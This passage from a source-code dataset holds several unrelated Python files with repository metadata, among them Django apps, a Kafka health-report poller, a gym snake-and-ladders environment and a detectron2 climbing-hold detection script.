assert str(pipeline.current_jobs[0]._path) == "LocalRes/job031"
def test_relion_pipeline_current_jobs_property_with_timing_info_multiple_jobs(
dials_data,
):
pipeline = RelionPipeline("Import/job001")
pipeline.load_nodes_from_star(
dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
)
logs = list(dials_data("relion_tutorial_data", pathlib=True).glob("pipeline*.log"))
pipeline.collect_job_times(logs)
pipeline.check_job_node_statuses(dials_data("relion_tutorial_data", pathlib=True))
pipeline._job_nodes[pipeline._job_nodes.index("LocalRes/job031")].environment[
"status"
] = None
pipeline._job_nodes[pipeline._job_nodes.index("MotionCorr/job002")].environment[
"status"
] = None
assert [str(cj._path) for cj in pipeline.current_jobs] == [
"MotionCorr/job002",
"LocalRes/job031",
]
@pytest.mark.skipif(sys.platform == "win32", reason="does not run on windows")
def test_get_pipeline_jobs_from_preprocess_log_file(dials_data):
pipeline = RelionPipeline("Import/job001")
pipeline.load_nodes_from_star(
dials_data("relion_tutorial_data", pathlib=True) / "default_pipeline.star"
)
preproc_jobs = pipeline._get_pipeline_jobs(
dials_data("relion_tutorial_data", pathlib=True) / "pipeline_PREPROCESS.log"
)
assert "MotionCorr/job002" in preproc_jobs
| 4,776 | 0 | 293 |
01122030ff57d9377ddf61352858ba09c5197d30 | 139 | py | Python | blog/urls.py | 31-13/portfolio | 86d69abc05ead28823db5def49622f04af0ebfd2 | [
"MIT"
] | null | null | null | blog/urls.py | 31-13/portfolio | 86d69abc05ead28823db5def49622f04af0ebfd2 | [
"MIT"
] | null | null | null | blog/urls.py | 31-13/portfolio | 86d69abc05ead28823db5def49622f04af0ebfd2 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path
from .views import blog
urlpatterns = [
path('', blog, name='blog'),
]
| 15.444444 | 32 | 0.705036 | from django.contrib import admin
from django.urls import path
from .views import blog
urlpatterns = [
path('', blog, name='blog'),
]
| 0 | 0 | 0 |
b34a1a7f59c7bf1d720c23f8b819112a2334aac4 | 1,506 | py | Python | code/snake_env.py | seahailang/LearningReinforcementLearning | f5b2425c352742440b3da0d428454fe29066129b | [
"MIT"
] | null | null | null | code/snake_env.py | seahailang/LearningReinforcementLearning | f5b2425c352742440b3da0d428454fe29066129b | [
"MIT"
] | null | null | null | code/snake_env.py | seahailang/LearningReinforcementLearning | f5b2425c352742440b3da0d428454fe29066129b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
@version: 0.0
@author: hailang
@Email: seahailang@gmail.com
@software: PyCharm
@file: snake_env.py
@time: 2018/6/21 15:45
"""
import numpy as np
import gym
from gym.spaces import Discrete
if __name__ == '__main__':
s = SnakeEnv(10,[10]) | 22.818182 | 84 | 0.573705 | #!/usr/bin/env python
# encoding: utf-8
"""
@version: 0.0
@author: hailang
@Email: seahailang@gmail.com
@software: PyCharm
@file: snake_env.py
@time: 2018/6/21 15:45
"""
import numpy as np
import gym
from gym.spaces import Discrete
class SnakeEnv(gym.Env):
SIZE=100
def __init__(self,ladder_num,dices):
# 初始化话蛇棋游戏
# ladder_num 表示有多少个梯子,梯子会在后面的代码中随机分配
# dices 表示有多少种投掷色字的策略
# SIZE规定了整个棋盘有多大
self.ladder_num = ladder_num
self.dices = dices
self.ladders = dict(np.random.randint(1,self.SIZE,size=(self.ladder_num,2)))
self.observation_space = Discrete(self.SIZE+1)
self.action_space = Discrete(len(dices))
items = list(self.ladders.items())
#双向的梯子
for k,v in items:
self.ladders[v] = k
print('ladders info:')
print(self.ladders)
print('dice ranges')
print(self.dices)
self.pos = 1
def _reset(self):
self.pos=1
return self.pos
def _step(self,a):
step = np.random.randint(1,self.dices[a]+1)
self.pos += step
if self.pos ==100:
return 100,100,1,{}
elif self.pos >100:
self.pos = 200 -self.pos
if self.pos in self.ladders:
self.pos = self.ladders[self.pos]
return self.pos,-1,0,{}
def reward(self,s):
if s == 100:
return 100
else:
return -1
if __name__ == '__main__':
s = SnakeEnv(10,[10]) | 1,189 | 124 | 23 |
dc0ceb405fac2cc1c20a9c0c0bcc6ae5f2dd07e9 | 134 | py | Python | Curso em video/Desafios1-20/Desafio6.py | Ry18-2003/Python-Journey | c926a733a578f3686767a1189bdccb4df137856d | [
"MIT"
] | null | null | null | Curso em video/Desafios1-20/Desafio6.py | Ry18-2003/Python-Journey | c926a733a578f3686767a1189bdccb4df137856d | [
"MIT"
] | null | null | null | Curso em video/Desafios1-20/Desafio6.py | Ry18-2003/Python-Journey | c926a733a578f3686767a1189bdccb4df137856d | [
"MIT"
] | null | null | null | n1 = int(input('Digite um número: '))
print(f'O dobro do número {n1} é {n1*2} o seu triplo {n1*3} e sua raiz quadrada é {n1**(1/2)}')
| 44.666667 | 95 | 0.626866 | n1 = int(input('Digite um número: '))
print(f'O dobro do número {n1} é {n1*2} o seu triplo {n1*3} e sua raiz quadrada é {n1**(1/2)}')
| 0 | 0 | 0 |
db29771268ea3ecddcf9d2fab597b5974c1769e6 | 532 | py | Python | testPython.py | nbcallah/Histogram-Sampler | 9360ea5c9923896a8ae63f5b7165f070645a8310 | [
"MIT"
] | null | null | null | testPython.py | nbcallah/Histogram-Sampler | 9360ea5c9923896a8ae63f5b7165f070645a8310 | [
"MIT"
] | null | null | null | testPython.py | nbcallah/Histogram-Sampler | 9360ea5c9923896a8ae63f5b7165f070645a8310 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import HistGen_py
import numpy
myHist = [100, 300, 300, 700, 900, 600, 400, 200, 300, 100]
myBins = ["infrared", "red", "orange", "yellow", "sour", "green", "teal", "blue", "violet", "ultraviolet"]
myTest = HistGen_py.HistGen(myHist)
for i in range(0,10):
index = myTest.genIndex(numpy.random.randint(0, high=numpy.iinfo(numpy.uint64).max, dtype='uint64'))
while index == len(myHist):
index = myTest.genIndex(numpy.random.randint(0, high=numpy.iinfo(numpy.uint64).max, dtype='uint64'))
print(myBins[index]) | 38 | 106 | 0.695489 | #!/usr/bin/python
import HistGen_py
import numpy
myHist = [100, 300, 300, 700, 900, 600, 400, 200, 300, 100]
myBins = ["infrared", "red", "orange", "yellow", "sour", "green", "teal", "blue", "violet", "ultraviolet"]
myTest = HistGen_py.HistGen(myHist)
for i in range(0,10):
index = myTest.genIndex(numpy.random.randint(0, high=numpy.iinfo(numpy.uint64).max, dtype='uint64'))
while index == len(myHist):
index = myTest.genIndex(numpy.random.randint(0, high=numpy.iinfo(numpy.uint64).max, dtype='uint64'))
print(myBins[index]) | 0 | 0 | 0 |
0fbe8b57c499b0a10f013e8738f4d89643439151 | 229 | py | Python | apronpy/cdll.py | caterinaurban/apronpy | 8a7e08e6929beeeeb97a9da648499be8c5d18bff | [
"MIT"
] | 7 | 2019-02-19T18:55:13.000Z | 2019-10-08T10:32:40.000Z | apronpy/cdll.py | caterinaurban/apronpy | 8a7e08e6929beeeeb97a9da648499be8c5d18bff | [
"MIT"
] | 3 | 2020-05-26T21:08:29.000Z | 2020-08-28T13:10:47.000Z | apronpy/cdll.py | caterinaurban/apronpy | 8a7e08e6929beeeeb97a9da648499be8c5d18bff | [
"MIT"
] | 1 | 2022-03-29T15:01:27.000Z | 2022-03-29T15:01:27.000Z | """
C DLLs
======
:Author: Caterina Urban
"""
from ctypes import util, CDLL
libc = CDLL(util.find_library('c'))
libapron = CDLL('libapron.so')
libgmp = CDLL(util.find_library('gmp'))
libmpfr = CDLL(util.find_library('mpfr'))
| 15.266667 | 41 | 0.676856 | """
C DLLs
======
:Author: Caterina Urban
"""
from ctypes import util, CDLL
libc = CDLL(util.find_library('c'))
libapron = CDLL('libapron.so')
libgmp = CDLL(util.find_library('gmp'))
libmpfr = CDLL(util.find_library('mpfr'))
| 0 | 0 | 0 |
5586bd40bf6dcfef172e32da01af9f4807ea5a33 | 371 | py | Python | alphatwirl/nanoaod/EventBuilderConfig.py | benkrikler/alphatwirl | cda7d12fec21291ea33af23234fc08be19430934 | [
"BSD-3-Clause"
] | null | null | null | alphatwirl/nanoaod/EventBuilderConfig.py | benkrikler/alphatwirl | cda7d12fec21291ea33af23234fc08be19430934 | [
"BSD-3-Clause"
] | 7 | 2018-02-26T10:32:26.000Z | 2018-03-19T12:27:12.000Z | alphatwirl/nanoaod/EventBuilderConfig.py | benkrikler/alphatwirl | cda7d12fec21291ea33af23234fc08be19430934 | [
"BSD-3-Clause"
] | null | null | null | ##__________________________________________________________________||
import collections
##__________________________________________________________________||
EventBuilderConfig = collections.namedtuple(
'EventBuilderConfig',
'base component'
)
# base is for roottree.EventBuilderConfig
##__________________________________________________________________||
| 28.538462 | 70 | 0.862534 | ##__________________________________________________________________||
import collections
##__________________________________________________________________||
EventBuilderConfig = collections.namedtuple(
'EventBuilderConfig',
'base component'
)
# base is for roottree.EventBuilderConfig
##__________________________________________________________________||
| 0 | 0 | 0 |
12cab3794b847a73861f7c5ad2a6f0f5f9050205 | 5,289 | py | Python | laksyt/entities/kafka/poller.py | laksyt/lks-persister | 42d9c795343e41b75d1c1915e835446e32c2fa40 | [
"MIT"
] | null | null | null | laksyt/entities/kafka/poller.py | laksyt/lks-persister | 42d9c795343e41b75d1c1915e835446e32c2fa40 | [
"MIT"
] | null | null | null | laksyt/entities/kafka/poller.py | laksyt/lks-persister | 42d9c795343e41b75d1c1915e835446e32c2fa40 | [
"MIT"
] | null | null | null | import asyncio
import logging
from dataclasses import dataclass
from typing import Optional
from kafka import KafkaConsumer
from kafka.errors import KafkaError
from laksyt.config.config import Config
from laksyt.entities.kafka.consumer import get_kafka_consumer
from laksyt.entities.kafka.schedule import Schedule, get_schedule
from laksyt.entities.report import HealthReport
logger = logging.getLogger(__name__)
@dataclass
class KafkaMessage:
"""Represents the offset&bytes pair that is Kafka message"""
offset: int
raw_bytes: bytes
class KafkaPoller:
"""Wrapper around KafkaConsumer that continuously polls for messages and
reports any errors along the way without breaking its stride
"""
def __init__(
self,
schedule: Schedule,
kafka_consumer: KafkaConsumer
):
"""Uses polling schedule and KafkaConsumer"""
self._schedule = schedule
self._kafka_consumer = kafka_consumer
def __aiter__(self):
"""Makes poller instances asynchronously iterable"""
return self.poll_continuously()
async def poll_continuously(self):
"""Exposes continuous polling function as an asynchronous generator"""
while True:
yield self._poll_once()
await asyncio.sleep(self._schedule.delay)
def _poll_once(self) -> Optional[list[HealthReport]]:
"""Does one synchronous poll and deserializes polled messages, if any,
into HealthReports
"""
batch = self._do_poll()
return self._deserialize_batch(batch)
def _do_poll(self) -> Optional[list[KafkaMessage]]:
"""Polls next limited batch of reports from Kafka, with timeout, then
commits offsets and returns flat list of Kafka messages
If polling or parsing fails, None is returned. For empty batches, an
empty list is returned.
"""
try:
raw_messages = self._kafka_consumer.poll(
timeout_ms=self._schedule.timeout * 1000,
max_records=self._schedule.max_records
)
except KafkaError:
logger.exception("Failed to poll for messages due to Kafka error")
return None
try:
self._kafka_consumer.commit()
except KafkaError:
logger.exception("Failed to commit topic offset due to Kafka error")
return self._parse_messages(raw_messages)
@staticmethod
def _parse_messages(raw_messages: Optional[dict]) \
-> Optional[list[KafkaMessage]]:
"""Extracts flat list of Kafka messages from Kafka's output
If given raw data cannot be parsed, an error is logged, then None is
returned. If a batch has no messages, an empty list is returned.
"""
result = None
try:
result = [
KafkaMessage(message.offset, message.value)
for _, messages in raw_messages.items()
for message in messages
]
except AttributeError:
logger.exception(
f"Failed to parse Kafka messages; dropping: {raw_messages}"
)
return result
def _deserialize_batch(self, batch: Optional[list[KafkaMessage]]) \
-> Optional[list[HealthReport]]:
"""Deserializes Kafka offset/message pairs and reports batch status"""
if batch is None:
return None # polling errors reported where encountered
reports = []
if not batch:
logger.info("Received empty batch of reports") # valid case
return reports
for message in batch:
report = self._deserialize_report(message)
if report is not None:
reports.append(report)
logger.info(f"Received {report}")
if not reports:
logger.error(
f"Failed to deserialize any of {len(batch)} Kafka messages"
" in latest batch"
)
elif len(reports) != len(batch):
logger.error(
f"Failed to deserialize {len(batch) - len(reports)}"
f" out of {len(batch)} Kafka messages in latest batch"
)
else:
logger.info(f"Received batch of {len(reports)} reports")
return reports
@staticmethod
def _deserialize_report(message: KafkaMessage) -> Optional[HealthReport]:
"""Deserializes Kafka message to HealthReport"""
offset, raw_bytes = message.offset, message.raw_bytes
report = None
try:
report = HealthReport.deserialize(raw_bytes)
except StopIteration: # deserialization fails with this exception
logger.error( # stack trace is more or less useless, so just error
f"Failed to deserialize Kafka message [offset: {offset},"
f" bytes: {raw_bytes}]; dropping"
)
return report
def get_kafka_poller(config: Config) -> KafkaPoller:
"""Extracts and validates Kafka consumer parameters from the application
config file for the active profile, then constructs and returns the
poller object
"""
return KafkaPoller(
get_schedule(config),
get_kafka_consumer(config)
)
| 35.496644 | 80 | 0.633012 | import asyncio
import logging
from dataclasses import dataclass
from typing import Optional
from kafka import KafkaConsumer
from kafka.errors import KafkaError
from laksyt.config.config import Config
from laksyt.entities.kafka.consumer import get_kafka_consumer
from laksyt.entities.kafka.schedule import Schedule, get_schedule
from laksyt.entities.report import HealthReport
logger = logging.getLogger(__name__)
@dataclass
class KafkaMessage:
"""Represents the offset&bytes pair that is Kafka message"""
offset: int
raw_bytes: bytes
class KafkaPoller:
"""Wrapper around KafkaConsumer that continuously polls for messages and
reports any errors along the way without breaking its stride
"""
def __init__(
self,
schedule: Schedule,
kafka_consumer: KafkaConsumer
):
"""Uses polling schedule and KafkaConsumer"""
self._schedule = schedule
self._kafka_consumer = kafka_consumer
def __aiter__(self):
"""Makes poller instances asynchronously iterable"""
return self.poll_continuously()
async def poll_continuously(self):
"""Exposes continuous polling function as an asynchronous generator"""
while True:
yield self._poll_once()
await asyncio.sleep(self._schedule.delay)
def _poll_once(self) -> Optional[list[HealthReport]]:
"""Does one synchronous poll and deserializes polled messages, if any,
into HealthReports
"""
batch = self._do_poll()
return self._deserialize_batch(batch)
def _do_poll(self) -> Optional[list[KafkaMessage]]:
"""Polls next limited batch of reports from Kafka, with timeout, then
commits offsets and returns flat list of Kafka messages
If polling or parsing fails, None is returned. For empty batches, an
empty list is returned.
"""
try:
raw_messages = self._kafka_consumer.poll(
timeout_ms=self._schedule.timeout * 1000,
max_records=self._schedule.max_records
)
except KafkaError:
logger.exception("Failed to poll for messages due to Kafka error")
return None
try:
self._kafka_consumer.commit()
except KafkaError:
logger.exception("Failed to commit topic offset due to Kafka error")
return self._parse_messages(raw_messages)
@staticmethod
def _parse_messages(raw_messages: Optional[dict]) \
-> Optional[list[KafkaMessage]]:
"""Extracts flat list of Kafka messages from Kafka's output
If given raw data cannot be parsed, an error is logged, then None is
returned. If a batch has no messages, an empty list is returned.
"""
result = None
try:
result = [
KafkaMessage(message.offset, message.value)
for _, messages in raw_messages.items()
for message in messages
]
except AttributeError:
logger.exception(
f"Failed to parse Kafka messages; dropping: {raw_messages}"
)
return result
def _deserialize_batch(self, batch: Optional[list[KafkaMessage]]) \
-> Optional[list[HealthReport]]:
"""Deserializes Kafka offset/message pairs and reports batch status"""
if batch is None:
return None # polling errors reported where encountered
reports = []
if not batch:
logger.info("Received empty batch of reports") # valid case
return reports
for message in batch:
report = self._deserialize_report(message)
if report is not None:
reports.append(report)
logger.info(f"Received {report}")
if not reports:
logger.error(
f"Failed to deserialize any of {len(batch)} Kafka messages"
" in latest batch"
)
elif len(reports) != len(batch):
logger.error(
f"Failed to deserialize {len(batch) - len(reports)}"
f" out of {len(batch)} Kafka messages in latest batch"
)
else:
logger.info(f"Received batch of {len(reports)} reports")
return reports
@staticmethod
def _deserialize_report(message: KafkaMessage) -> Optional[HealthReport]:
"""Deserializes Kafka message to HealthReport"""
offset, raw_bytes = message.offset, message.raw_bytes
report = None
try:
report = HealthReport.deserialize(raw_bytes)
except StopIteration: # deserialization fails with this exception
logger.error( # stack trace is more or less useless, so just error
f"Failed to deserialize Kafka message [offset: {offset},"
f" bytes: {raw_bytes}]; dropping"
)
return report
def get_kafka_poller(config: Config) -> KafkaPoller:
"""Extracts and validates Kafka consumer parameters from the application
config file for the active profile, then constructs and returns the
poller object
"""
return KafkaPoller(
get_schedule(config),
get_kafka_consumer(config)
)
| 0 | 0 | 0 |
44344be341e2ef2e0c8c3f99fe68ccdecf79e2aa | 97 | py | Python | moviesdbapi/apps.py | sratatata/netguru-movies | 33337fc71ae7a2ba8fcb48f9b08820532b2a5e78 | [
"Unlicense"
] | 1 | 2019-03-03T22:25:24.000Z | 2019-03-03T22:25:24.000Z | moviesdbapi/apps.py | sratatata/netguru-movies | 33337fc71ae7a2ba8fcb48f9b08820532b2a5e78 | [
"Unlicense"
] | 13 | 2018-07-29T15:46:56.000Z | 2021-06-10T20:46:51.000Z | moviesdbapi/apps.py | sratatata/netguru-movies | 33337fc71ae7a2ba8fcb48f9b08820532b2a5e78 | [
"Unlicense"
] | 1 | 2020-05-09T16:01:01.000Z | 2020-05-09T16:01:01.000Z | from django.apps import AppConfig
| 16.166667 | 35 | 0.773196 | from django.apps import AppConfig
class MoviesdbapiConfig(AppConfig):
name = 'moviesdbapi'
| 0 | 39 | 23 |
4b6f8bee9fa9d7aac526c896109c40567beae7a8 | 2,794 | py | Python | mvrss/learners/initializer.py | valeoai/MVRSS | 368c2c892d8e6076c59cb21fd1056d472887990d | [
"Apache-2.0"
] | 24 | 2021-05-19T02:38:48.000Z | 2022-03-28T09:19:15.000Z | mvrss/learners/initializer.py | xuqinwang/MVRSS | 368c2c892d8e6076c59cb21fd1056d472887990d | [
"Apache-2.0"
] | 1 | 2021-07-17T01:54:53.000Z | 2021-09-13T10:34:06.000Z | mvrss/learners/initializer.py | xuqinwang/MVRSS | 368c2c892d8e6076c59cb21fd1056d472887990d | [
"Apache-2.0"
] | 6 | 2021-06-02T09:14:04.000Z | 2022-03-02T15:21:44.000Z | """Initializer class to prepare training"""
import json
from torch.utils.data import DataLoader
from mvrss.utils.paths import Paths
from mvrss.loaders.dataset import Carrada
from mvrss.loaders.dataloaders import SequenceCarradaDataset
class Initializer:
"""Class to prepare training model
PARAMETERS
----------
cfg: dict
Configuration file used for train/test
"""
def get_data(self):
"""Return parameters of the training"""
return self._structure_data()
| 35.367089 | 93 | 0.618826 | """Initializer class to prepare training"""
import json
from torch.utils.data import DataLoader
from mvrss.utils.paths import Paths
from mvrss.loaders.dataset import Carrada
from mvrss.loaders.dataloaders import SequenceCarradaDataset
class Initializer:
"""Class to prepare training model
PARAMETERS
----------
cfg: dict
Configuration file used for train/test
"""
def __init__(self, cfg):
self.cfg = cfg
self.paths = Paths().get()
def _get_data(self):
data = Carrada()
train = data.get('Train')
val = data.get('Validation')
test = data.get('Test')
return [train, val, test]
def _get_datasets(self):
data = self._get_data()
trainset = SequenceCarradaDataset(data[0])
valset = SequenceCarradaDataset(data[1])
testset = SequenceCarradaDataset(data[2])
return [trainset, valset, testset]
def _get_dataloaders(self):
trainset, valset, testset = self._get_datasets()
trainloader = DataLoader(trainset, batch_size=1, shuffle=True, num_workers=0)
valloader = DataLoader(valset, batch_size=1, shuffle=False, num_workers=0)
testloader = DataLoader(testset, batch_size=1, shuffle=False, num_workers=0)
return [trainloader, valloader, testloader]
def _structure_data(self):
data = dict()
dataloaders = self._get_dataloaders()
name_exp = (self.cfg['model'] + '_' +
'e' + str(self.cfg['nb_epochs']) + '_' +
'lr' + str(self.cfg['lr']) + '_' +
's' + str(self.cfg['torch_seed']))
self.cfg['name_exp'] = name_exp
folder_path = self.paths['logs'] / self.cfg['dataset'] / self.cfg['model'] / name_exp
temp_folder_name = folder_path.name + '_' + str(self.cfg['version'])
temp_folder_path = folder_path.parent / temp_folder_name
while temp_folder_path.exists():
self.cfg['version'] += 1
temp_folder_name = folder_path.name + '_' + str(self.cfg['version'])
temp_folder_path = folder_path.parent / temp_folder_name
folder_path = temp_folder_path
self.paths['results'] = folder_path / 'results'
self.paths['writer'] = folder_path / 'boards'
self.paths['results'].mkdir(parents=True, exist_ok=True)
self.paths['writer'].mkdir(parents=True, exist_ok=True)
config_path = folder_path / 'config.json'
with open(config_path, 'w') as fp:
json.dump(self.cfg, fp)
data['cfg'] = self.cfg
data['paths'] = self.paths
data['dataloaders'] = dataloaders
return data
def get_data(self):
"""Return parameters of the training"""
return self._structure_data()
| 2,152 | 0 | 135 |
f302fb50c34cca6ae19d61421d07a3441abffc5d | 1,858 | py | Python | pdc/apps/osbs/signals.py | tzhaoredhat/automation | a1867dc2d3591fdae1fa7f80d457c25f9705070e | [
"MIT"
] | 18 | 2015-12-15T17:56:18.000Z | 2021-04-10T13:49:48.000Z | pdc/apps/osbs/signals.py | tzhaoredhat/automation | a1867dc2d3591fdae1fa7f80d457c25f9705070e | [
"MIT"
] | 303 | 2015-11-18T07:37:06.000Z | 2021-05-26T12:34:01.000Z | pdc/apps/osbs/signals.py | tzhaoredhat/automation | a1867dc2d3591fdae1fa7f80d457c25f9705070e | [
"MIT"
] | 27 | 2015-11-19T20:33:54.000Z | 2021-03-25T08:15:28.000Z | #
# Copyright (c) 2015 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
import json
from django.dispatch import receiver
from django.db.models.signals import post_save
from . import models
from pdc.apps.component import signals as component_signals
from pdc.apps.component import models as component_models
@receiver(post_save, sender=component_models.ReleaseComponent)
def component_post_save_handler(sender, instance, **kwargs):
"""Create or delete OSBS record after component is saved.
"""
if instance.type.has_osbs and not hasattr(instance, 'osbs'):
models.OSBSRecord.objects.create(component=instance)
elif not instance.type.has_osbs and hasattr(instance, 'osbs'):
models.OSBSRecord.objects.get(component=instance).delete()
@receiver(post_save, sender=component_models.ReleaseComponentType)
def type_post_save_handler(sender, instance, **kwargs):
"""Create records for all components if their type now has OSBS.
If the has_osbs has been set to True, this call will take quite a lot of
time.
"""
if instance.has_osbs:
models.OSBSRecord.objects.bulk_create(
[models.OSBSRecord(component=c)
for c in instance.release_components.filter(osbs__isnull=True)]
)
else:
models.OSBSRecord.objects.filter(component__type=instance).delete()
@receiver(component_signals.releasecomponent_clone)
| 36.431373 | 79 | 0.738967 | #
# Copyright (c) 2015 Red Hat
# Licensed under The MIT License (MIT)
# http://opensource.org/licenses/MIT
#
import json
from django.dispatch import receiver
from django.db.models.signals import post_save
from . import models
from pdc.apps.component import signals as component_signals
from pdc.apps.component import models as component_models
@receiver(post_save, sender=component_models.ReleaseComponent)
def component_post_save_handler(sender, instance, **kwargs):
"""Create or delete OSBS record after component is saved.
"""
if instance.type.has_osbs and not hasattr(instance, 'osbs'):
models.OSBSRecord.objects.create(component=instance)
elif not instance.type.has_osbs and hasattr(instance, 'osbs'):
models.OSBSRecord.objects.get(component=instance).delete()
@receiver(post_save, sender=component_models.ReleaseComponentType)
def type_post_save_handler(sender, instance, **kwargs):
"""Create records for all components if their type now has OSBS.
If the has_osbs has been set to True, this call will take quite a lot of
time.
"""
if instance.has_osbs:
models.OSBSRecord.objects.bulk_create(
[models.OSBSRecord(component=c)
for c in instance.release_components.filter(osbs__isnull=True)]
)
else:
models.OSBSRecord.objects.filter(component__type=instance).delete()
@receiver(component_signals.releasecomponent_clone)
def clone_osbs_record(sender, request, orig_component_pk, component, **kwargs):
if not component.type.has_osbs:
return
old_record = models.OSBSRecord.objects.get(component_id=orig_component_pk)
component.osbs.autorebuild = old_record.autorebuild
component.osbs.save()
request.changeset.add('osbsrecord', component.osbs.pk,
'null', json.dumps(component.osbs.export()))
| 400 | 0 | 22 |
1cfe73b68360a104ad108ff8ef1c4c995a3eb057 | 241 | py | Python | components/icdc-sheepdog/tests/integration/datadictwithobjid/utils.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 2 | 2019-06-10T15:30:51.000Z | 2020-01-18T23:24:13.000Z | components/icdc-sheepdog/tests/utils.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | null | null | null | components/icdc-sheepdog/tests/utils.py | CBIIT/icdc-docker | 5dc78b96a8d885b3fa427c55b9cc19f4771910fa | [
"Apache-2.0"
] | 1 | 2022-03-31T09:52:46.000Z | 2022-03-31T09:52:46.000Z | import os
def read_file(filename):
"""Read the contents of a file in the tests directory."""
root_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(root_dir, filename), 'r') as f:
return f.read()
| 26.777778 | 61 | 0.66805 | import os
def read_file(filename):
"""Read the contents of a file in the tests directory."""
root_dir = os.path.dirname(os.path.realpath(__file__))
with open(os.path.join(root_dir, filename), 'r') as f:
return f.read()
| 0 | 0 | 0 |
27cd2cb7ec28c5369648661a45650146484ef31f | 8,687 | py | Python | src/extract_holds.py | juangallostra/climbnet | 6ea48360b4501b40b24b3e6ff6182d1171d1ea9c | [
"Apache-2.0"
] | null | null | null | src/extract_holds.py | juangallostra/climbnet | 6ea48360b4501b40b24b3e6ff6182d1171d1ea9c | [
"Apache-2.0"
] | null | null | null | src/extract_holds.py | juangallostra/climbnet | 6ea48360b4501b40b24b3e6ff6182d1171d1ea9c | [
"Apache-2.0"
] | null | null | null | import os
import json
from itertools import product
import numpy as np
from PIL import Image
from os import walk
import cv2
from detectron2 import model_zoo
from detectron2.config import get_cfg
from detectron2.data import DatasetCatalog
from detectron2.data import MetadataCatalog
from detectron2.data.datasets import register_coco_instances
from detectron2.engine import DefaultPredictor
from detectron2.utils.visualizer import ColorMode
from detectron2.utils.visualizer import Visualizer
OUTPUT_IMAGE_EXTENSION = '.png'
INPUT_DIR = 'raw_images'
OUTPUT_DIR = 'processed_images'
# All this should better be refactored into a class
def segment_image_into_tiles(
filename,
tile_dimensions = (None, None),
dir_in = "",
dir_out = "",
ext = OUTPUT_IMAGE_EXTENSION,
save_tiles=True):
"""
Segments an image into tiles.
:param filename: The name of the image file to segment.
:type filename: str
:param dir_in: The directory containing the image file.
:type dir_in: str
:param dir_out: The directory to save the tiles to.
:type dir_out: str
:param ext: The extension of the image file.
:type ext: str
:param tile_dimensions: The dimensions of the tiles.
:type tile_dimensions: tuple
:param save_tiles: Whether or not to save the tiles.
:type save_tiles: bool
"""
tiles = dict()
name, _ = os.path.splitext(filename)
img = Image.open(os.path.join(dir_in, filename))
img_w, img_h = img.size
tile_w = tile_dimensions[0] if tile_dimensions[0] is not None else img_w
tile_h = tile_dimensions[1] if tile_dimensions[1] is not None else img_h
grid = product(range(0, img_h-img_h%tile_h, tile_h), range(0, img_w-img_w%tile_w, tile_w))
for i, j in grid:
box = (j, i, j+tile_w, i+tile_h)
out = os.path.join(dir_out, f'{name}_{i}_{j}{ext}')
tile = img.crop(box)
if save_tiles:
tile.save(out)
tiles[out] = tile
return tiles
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description='Hold detection')
parser.add_argument('images_path', type=str, default='', help='The input wall image file')
parser.add_argument('model_path', type=str, default='', help='climbnet model weights')
parser.add_argument('tile_width', type=int, default=0, help='Tile width')
parser.add_argument('tile_height', type=int, default=0, help='Tile height')
parser.add_argument('combine_results', type=bool, default=False, help='Mix results of split detection and overall detection')
args = parser.parse_args()
f = []
for (dirpath, dirnames, filenames) in walk(args.images_path):
f.extend(filenames)
break
main(f, args.model_path, args.tile_width, args.tile_height, args.combine_results)
# sample run:
# > python .\extract_holds.py raw_images ..\model_weights\model_d2_R_50_FPN_3x.pth 0 600 False | 38.608889 | 137 | 0.657419 | import os
import json
from itertools import product
import numpy as np
from PIL import Image
from os import walk
import cv2
from detectron2 import model_zoo
from detectron2.config import get_cfg
from detectron2.data import DatasetCatalog
from detectron2.data import MetadataCatalog
from detectron2.data.datasets import register_coco_instances
from detectron2.engine import DefaultPredictor
from detectron2.utils.visualizer import ColorMode
from detectron2.utils.visualizer import Visualizer
OUTPUT_IMAGE_EXTENSION = '.png'
INPUT_DIR = 'raw_images'
OUTPUT_DIR = 'processed_images'
# All this should better be refactored into a class
def segment_image_into_tiles(
filename,
tile_dimensions = (None, None),
dir_in = "",
dir_out = "",
ext = OUTPUT_IMAGE_EXTENSION,
save_tiles=True):
"""
Segments an image into tiles.
:param filename: The name of the image file to segment.
:type filename: str
:param dir_in: The directory containing the image file.
:type dir_in: str
:param dir_out: The directory to save the tiles to.
:type dir_out: str
:param ext: The extension of the image file.
:type ext: str
:param tile_dimensions: The dimensions of the tiles.
:type tile_dimensions: tuple
:param save_tiles: Whether or not to save the tiles.
:type save_tiles: bool
"""
tiles = dict()
name, _ = os.path.splitext(filename)
img = Image.open(os.path.join(dir_in, filename))
img_w, img_h = img.size
tile_w = tile_dimensions[0] if tile_dimensions[0] is not None else img_w
tile_h = tile_dimensions[1] if tile_dimensions[1] is not None else img_h
grid = product(range(0, img_h-img_h%tile_h, tile_h), range(0, img_w-img_w%tile_w, tile_w))
for i, j in grid:
box = (j, i, j+tile_w, i+tile_h)
out = os.path.join(dir_out, f'{name}_{i}_{j}{ext}')
tile = img.crop(box)
if save_tiles:
tile.save(out)
tiles[out] = tile
return tiles
def config_detector(model_path):
# config values
mask_path = "./mask.json"
config_file = "COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml"
device = "cpu"
dataset = "climb_dataset"
# General detector setup
register_coco_instances(dataset, {}, mask_path, "")
cfg = get_cfg()
cfg.merge_from_file(model_zoo.get_config_file(config_file))
cfg.DATALOADER.NUM_WORKERS = 1
cfg.MODEL.ROI_HEADS.NUM_CLASSES = 3 # 3 classes (hold, volume, downclimb)
cfg.MODEL.WEIGHTS = os.path.join(model_path)
cfg.MODEL.DEVICE = device
cfg.DATASETS.TEST = (dataset,)
# set the testing threshold for this model
cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = 0.75
# setup inference
predictor = DefaultPredictor(cfg)
train_metadata = MetadataCatalog.get(dataset)
# dataset catalog needs to exist so the polygon classes show up correctly
DatasetCatalog.get(dataset)
return predictor, train_metadata, device
